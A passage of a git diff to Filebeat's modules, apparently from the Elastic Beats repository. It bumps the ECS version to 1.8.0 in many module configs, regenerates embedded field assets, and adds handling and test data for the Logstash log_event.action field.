\"node.id\":\"0RMNyghkQYCc_gVd1G6tZQ\", \"event.type\":\"transport\", \"event.action\":\"run_as_granted\", \"user.name\":\"elastic\", \"user.run_as.name\":\"user1\", \"user.realm\":\"reserved\", \"user.run_as.realm\":\"default_native\", \"user.roles\":[\"superuser\"], \"origin.type\":\"rest\", \"origin.address\":\"[::1]:52623\", \"request.id\":\"dGqPTdEQSX2TAPS3cvc1qA\", \"action\":\"indices:data/read/search\", \"request.name\":\"SearchRequest\", \"indices\":[\"alias1\"]}", + "related.user": [ + "elastic", + "user1" + ], + "service.type": "elasticsearch", + "source.address": "[::1]:52623", + "source.ip": "::1", + "source.port": 52623, + "user.effective.name": "user1", + "user.name": "elastic" } ] \ No newline at end of file diff --git a/filebeat/module/elasticsearch/deprecation/config/log.yml b/filebeat/module/elasticsearch/deprecation/config/log.yml index 7730827c5b4b..62e291e30de5 100644 --- a/filebeat/module/elasticsearch/deprecation/config/log.yml +++ b/filebeat/module/elasticsearch/deprecation/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/fields.go b/filebeat/module/elasticsearch/fields.go index 4f44e586a19d..66aae291f49f 100644 --- a/filebeat/module/elasticsearch/fields.go +++ b/filebeat/module/elasticsearch/fields.go @@ -32,5 +32,5 @@ func init() { // AssetElasticsearch returns asset data. // This is the base64 encoded gzipped contents of module/elasticsearch. func AssetElasticsearch() string { - return "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" + return "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" } diff --git a/filebeat/module/elasticsearch/gc/config/gc.yml b/filebeat/module/elasticsearch/gc/config/gc.yml index 67967e20abc3..ba6d4dceefd3 100644 --- a/filebeat/module/elasticsearch/gc/config/gc.yml +++ b/filebeat/module/elasticsearch/gc/config/gc.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/server/config/log.yml b/filebeat/module/elasticsearch/server/config/log.yml index c784b5996fe3..1723c9c86b6c 100644 --- a/filebeat/module/elasticsearch/server/config/log.yml +++ b/filebeat/module/elasticsearch/server/config/log.yml @@ -15,4 +15,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml index 010a828ce8e7..6b57b280a257 100644 --- a/filebeat/module/elasticsearch/slowlog/config/slowlog.yml +++ b/filebeat/module/elasticsearch/slowlog/config/slowlog.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/haproxy/log/config/file.yml b/filebeat/module/haproxy/log/config/file.yml index 19f230a3247d..1fc1e5a33c70 100644 --- a/filebeat/module/haproxy/log/config/file.yml +++ b/filebeat/module/haproxy/log/config/file.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/haproxy/log/config/syslog.yml b/filebeat/module/haproxy/log/config/syslog.yml index fcad82506aa4..cf755c53a968 100644 --- a/filebeat/module/haproxy/log/config/syslog.yml +++ b/filebeat/module/haproxy/log/config/syslog.yml @@ -6,4 +6,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/debug/config/debug.yml b/filebeat/module/icinga/debug/config/debug.yml index cbc9eb1477b0..34bdcef7fa88 100644 --- a/filebeat/module/icinga/debug/config/debug.yml +++ b/filebeat/module/icinga/debug/config/debug.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/main/config/main.yml b/filebeat/module/icinga/main/config/main.yml index cbc9eb1477b0..34bdcef7fa88 100644 --- a/filebeat/module/icinga/main/config/main.yml +++ b/filebeat/module/icinga/main/config/main.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/icinga/startup/config/startup.yml b/filebeat/module/icinga/startup/config/startup.yml index cd175ad6523a..81a45be7e91b 100644 --- a/filebeat/module/icinga/startup/config/startup.yml +++ b/filebeat/module/icinga/startup/config/startup.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/iis/access/config/iis-access.yml b/filebeat/module/iis/access/config/iis-access.yml index 0ca1a0c54377..aadbabb01ede 100644 --- a/filebeat/module/iis/access/config/iis-access.yml +++ b/filebeat/module/iis/access/config/iis-access.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/iis/error/config/iis-error.yml b/filebeat/module/iis/error/config/iis-error.yml index 0ca1a0c54377..aadbabb01ede 100644 --- a/filebeat/module/iis/error/config/iis-error.yml +++ b/filebeat/module/iis/error/config/iis-error.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/kafka/log/config/log.yml b/filebeat/module/kafka/log/config/log.yml index be425d89b1f5..87f38b44128d 100644 --- a/filebeat/module/kafka/log/config/log.yml +++ b/filebeat/module/kafka/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/kibana/log/config/log.yml b/filebeat/module/kibana/log/config/log.yml index bcf49873fb30..a1c113f53a8d 100644 --- a/filebeat/module/kibana/log/config/log.yml +++ b/filebeat/module/kibana/log/config/log.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/logstash/fields.go b/filebeat/module/logstash/fields.go index 2097117ebf70..c65c5f1955de 100644 --- a/filebeat/module/logstash/fields.go +++ b/filebeat/module/logstash/fields.go @@ -32,5 +32,5 @@ func init() { // AssetLogstash returns asset data. // This is the base64 encoded gzipped contents of module/logstash. func AssetLogstash() string { - return "eJzsVU1v2zAMvedXED23+QE+9LKtQIB9ANvuhmLTMhdJFPSRxP9+sB0ntiN3SNsVGDDdLFp875FP1APssMlAsfRB+HoFECgozOBu2LpbAZToC0c2EJsMHlcAcD4BX7iMClcAFaEqfdZFH8AIjZO87QqNxQyk42hPO4nM00yzbOe9C9HPI6Ln2BXQIli/njpIqBxrCDXCkLRTsB79Ouc25qeHUoxXT2WHzYFdOYs9Q6hdP2s85QR2UCjhPRxqdNhRxD2aAOxIkhEB10lKoXYo5rCvoLQxFTst2jCILcfQUXHRGDLyhDbiqFguMQTQUQXKUwWdKMBjuAoOGq6CI6vkXYGS0nn7C4t56A/Kd9iAMCXshYoIJW6jlK1mulQk3QJLFhUZzOmWPuBRaNv6Wwsyt9tm8xG46lowwF/Ipb2L3guZNq9QJPwsYkWol05pkk707IKLmG4Q7lHdiKZYrlPnlvAGLK/4MJsdt86H6xT/B8E/MQiWh8CLZH8XByijtsPtOmlSSZy/qcuqKMnk7cfbqfsqNJ7nRgfwHHYL9IYeb+wMO4ONsTH4e3giFdD5e/gWQ7vT3oIPXGLhF8zOvMvJ5JqUovks6TkqNvI2gp+OWMTO74E0QsVuxBXIQI+GBZtygdepcFY4odO0XlS6H8G1l65/mSYlhIJNRTL24/H97dkrzZPv7eue4ofHqd6JUIgeS9g2o0qkG/IerxAkjGmE4bQBlnG7CbMuF3o5A/8dAAD//7rhE3k=" + return "eJzsVk1v2zAMvedXED23+QE+9LKtQIF9ANvuhmLTMhdJFPSRxP9+sB0ntiN3TdsVGDDdIlp871FPZO5gi00GiqUPwtcrgEBBYQY3w9bNCqBEXziygdhkcL8CgNMJ+MJlVLgCqAhV6bMuegdGaJzkbVdoLGYgHUd73ElknmaaZTvtnYl+HhE9xS6AFsH69dBBQuVYQ6gRhqSdgvXo0zm3MT89lGK8eipbbPbsylnsCULt+lnjMSewg0IJ72Ffo8OOIu7QBGBHkowIuE5SCrVDMYd9BaVHU7HTog2D2HAMHRUXjSEjj2gjjorlEkMAHVWgPFXQiQI8hIvgoOEiOLJK3hUoKZ03v7CYh/6gfIsNCFPCTqiIUOImStlqpnNF0ldworIWRfvVsy9jSGDJoiKDOV1zkXgQ2rYPRAuaYz7Dd48fgavuDgf4s7q0+dF7IdPuF4qEn0WsCPXSKU3SiZ5dcBHTZcUdqivRFMt16twS3oDlFe9nzefaBnOZ4n8n+Sc6yXIXeZHs72IPZdR2eF1HTSqJ8zd1WRUlmbz98XbqvgqNp77RATyF3QK9occbO8PO4NHYGPwtPJAK6PwtfIuh3WlfwQcusfALZmfe5mRyTUrRvJf0HBUbeR3BTwcsYuf3QBqhYjfiCmSgR8OCTbnA61g4K5zQaVovKt2P4NpH14+2SQmhYFORjH17fH979krz5MB+3Sy/u5/qnQiF6LGETTOqxMJwf4cpBAljGmE4bYBl3P5PSLlwlzPw3wEAAP//W7kkpQ==" } diff --git a/filebeat/module/logstash/log/_meta/fields.yml b/filebeat/module/logstash/log/_meta/fields.yml index 6ca12ca11bfb..36fa8bfb0cbc 100644 --- a/filebeat/module/logstash/log/_meta/fields.yml +++ b/filebeat/module/logstash/log/_meta/fields.yml @@ -19,6 +19,8 @@ type: object description: > key and value debugging information. + - name: log_event.action + type: keyword - name: pipeline_id type: keyword example: main diff --git a/filebeat/module/logstash/log/config/log.yml b/filebeat/module/logstash/log/config/log.yml index 8c094e3c6ad0..a90a5be8d96d 100644 --- a/filebeat/module/logstash/log/config/log.yml +++ b/filebeat/module/logstash/log/config/log.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/logstash/log/ingest/pipeline-json.yml b/filebeat/module/logstash/log/ingest/pipeline-json.yml index f14a3be28555..807079ed84e3 100644 --- a/filebeat/module/logstash/log/ingest/pipeline-json.yml +++ b/filebeat/module/logstash/log/ingest/pipeline-json.yml @@ -31,6 +31,16 @@ processors: - rename: field: logstash.log.level target_field: log.level +- script: + description: Convert logstash.log.log_event.action elements to string. + if: ctx?.logstash?.log?.log_event?.action instanceof List + lang: painless + source: | + def items = []; + ctx.logstash.log.log_event.action.forEach(v -> { + items.add(v.toString()); + }); + ctx.logstash.log.log_event.action = items; - set: field: event.kind value: event diff --git a/filebeat/module/logstash/log/test/logstash-json.log b/filebeat/module/logstash/log/test/logstash-json.log index bfd931653ab8..503d6ce24498 100644 --- a/filebeat/module/logstash/log/test/logstash-json.log +++ b/filebeat/module/logstash/log/test/logstash-json.log @@ -1,3 +1,4 @@ {"level":"INFO","loggerName":"logstash.agent","timeMillis":1546896321871,"thread":"Ruby-0-Thread-1: /Users/mat/work/elastic/releases/6.5.1/logstash/lib/bootstrap/environment.rb:6","logEvent":{"message":"Pipelines running","count":1,"running_pipelines":[{"metaClass":{"metaClass":{"metaClass":{"running_pipelines":"[:main]","non_running_pipelines":[]}}}}]}} {"level":"INFO","loggerName":"logstash.pipeline","timeMillis":1546896322538,"thread":"[main]>worker7","logEvent":{"message":"Pipeline has terminated","pipeline_id":"main","thread":"#"}} {"level":"INFO","loggerName":"logstash.agent","timeMillis":1546896322594,"thread":"Api Webserver","logEvent":{"message":"Successfully started Logstash API endpoint","port":9600}} +{"level":"WARN","loggerName":"logstash.outputs.elasticsearch","timeMillis":1612827484046,"thread":"[foo]>worker1","logEvent":{"message":"Could not index event to Elasticsearch.","status":400,"action":["update",{"_id":"foo-1234abcd-96c6-4828-bcd4-51d33a156431","_index":"filebeat-foo-2021.02","_type":"_doc","retry_on_conflict":1},{"metaClass":{"metaClass":{"metaClass":{"action":"[\"update\", {:_id=>\"foo-1234abcd-96c6-4828-bcd4-51d33a156431\", :_index=>\"filebeat-foo-2021.02\", :routing=>nil, :_type=>\"_doc\", :retry_on_conflict=>1}, #]","response":{"update":{"_index":"filebeat-foo-2021.02","_type":"_doc","_id":"foo-1234abcd-96c6-4828-bcd4-51d33a156431","status":400,"error":{"type":"mapper_parsing_exception","reason":"failed to parse field [bar] of type [long] in document with id 'foo-1234abcd-96c6-4828-bcd4-51d33a156431'. Preview of field's value: 'ABCDEFGHIJ'","caused_by":{"type":"illegal_argument_exception","reason":"For input string: \"ABCDEFGHIJ\""}}}}}}}}]}} diff --git a/filebeat/module/logstash/log/test/logstash-json.log-expected.json b/filebeat/module/logstash/log/test/logstash-json.log-expected.json index 4bbf77ad25f2..9cf6c292e391 100644 --- a/filebeat/module/logstash/log/test/logstash-json.log-expected.json +++ b/filebeat/module/logstash/log/test/logstash-json.log-expected.json @@ -59,5 +59,26 @@ "logstash.log.thread": "Api Webserver", "message": "Successfully started Logstash API endpoint", "service.type": "logstash" + }, + { + "@timestamp": "2021-02-08T23:38:04.046Z", + "event.dataset": "logstash.log", + "event.kind": "event", + "event.module": "logstash", + "event.type": "info", + "fileset.name": "log", + "input.type": "log", + "log.level": "WARN", + "log.offset": 745, + "logstash.log.log_event.action": [ + "update", + "{_index=filebeat-foo-2021.02, _type=_doc, _id=foo-1234abcd-96c6-4828-bcd4-51d33a156431, retry_on_conflict=1}", + "{metaClass={metaClass={metaClass={response={update={_index=filebeat-foo-2021.02, _type=_doc, _id=foo-1234abcd-96c6-4828-bcd4-51d33a156431, error={reason=failed to parse field [bar] of type [long] in document with id 'foo-1234abcd-96c6-4828-bcd4-51d33a156431'. Preview of field's value: 'ABCDEFGHIJ', caused_by={reason=For input string: \"ABCDEFGHIJ\", type=illegal_argument_exception}, type=mapper_parsing_exception}, status=400}}, action=[\"update\", {:_id=>\"foo-1234abcd-96c6-4828-bcd4-51d33a156431\", :_index=>\"filebeat-foo-2021.02\", :routing=>nil, :_type=>\"_doc\", :retry_on_conflict=>1}, #]}}}}" + ], + "logstash.log.log_event.status": 400, + "logstash.log.module": "logstash.outputs.elasticsearch", + "logstash.log.thread": "[foo]>worker1", + "message": "Could not index event to Elasticsearch.", + "service.type": "logstash" } ] \ No newline at end of file diff --git a/filebeat/module/logstash/slowlog/config/slowlog.yml b/filebeat/module/logstash/slowlog/config/slowlog.yml index 8de436195b51..f391047702dc 100644 --- a/filebeat/module/logstash/slowlog/config/slowlog.yml +++ b/filebeat/module/logstash/slowlog/config/slowlog.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mongodb/log/config/log.yml b/filebeat/module/mongodb/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/mongodb/log/config/log.yml +++ b/filebeat/module/mongodb/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mysql/error/config/error.yml b/filebeat/module/mysql/error/config/error.yml index 513287f28f8b..2bf22a084ec8 100644 --- a/filebeat/module/mysql/error/config/error.yml +++ b/filebeat/module/mysql/error/config/error.yml @@ -16,4 +16,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/mysql/slowlog/config/slowlog.yml b/filebeat/module/mysql/slowlog/config/slowlog.yml index 557a49be46fc..6b83b5227060 100644 --- a/filebeat/module/mysql/slowlog/config/slowlog.yml +++ b/filebeat/module/mysql/slowlog/config/slowlog.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nats/log/config/log.yml b/filebeat/module/nats/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/nats/log/config/log.yml +++ b/filebeat/module/nats/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/access/config/nginx-access.yml b/filebeat/module/nginx/access/config/nginx-access.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/nginx/access/config/nginx-access.yml +++ b/filebeat/module/nginx/access/config/nginx-access.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/error/config/nginx-error.yml b/filebeat/module/nginx/error/config/nginx-error.yml index 680f826ce4eb..bc547d46f369 100644 --- a/filebeat/module/nginx/error/config/nginx-error.yml +++ b/filebeat/module/nginx/error/config/nginx-error.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml index cb319d01efe4..2bd2a117d1c7 100644 --- a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml +++ b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/osquery/result/config/result.yml b/filebeat/module/osquery/result/config/result.yml index 2dd7593f42df..cd17ae39bdf5 100644 --- a/filebeat/module/osquery/result/config/result.yml +++ b/filebeat/module/osquery/result/config/result.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 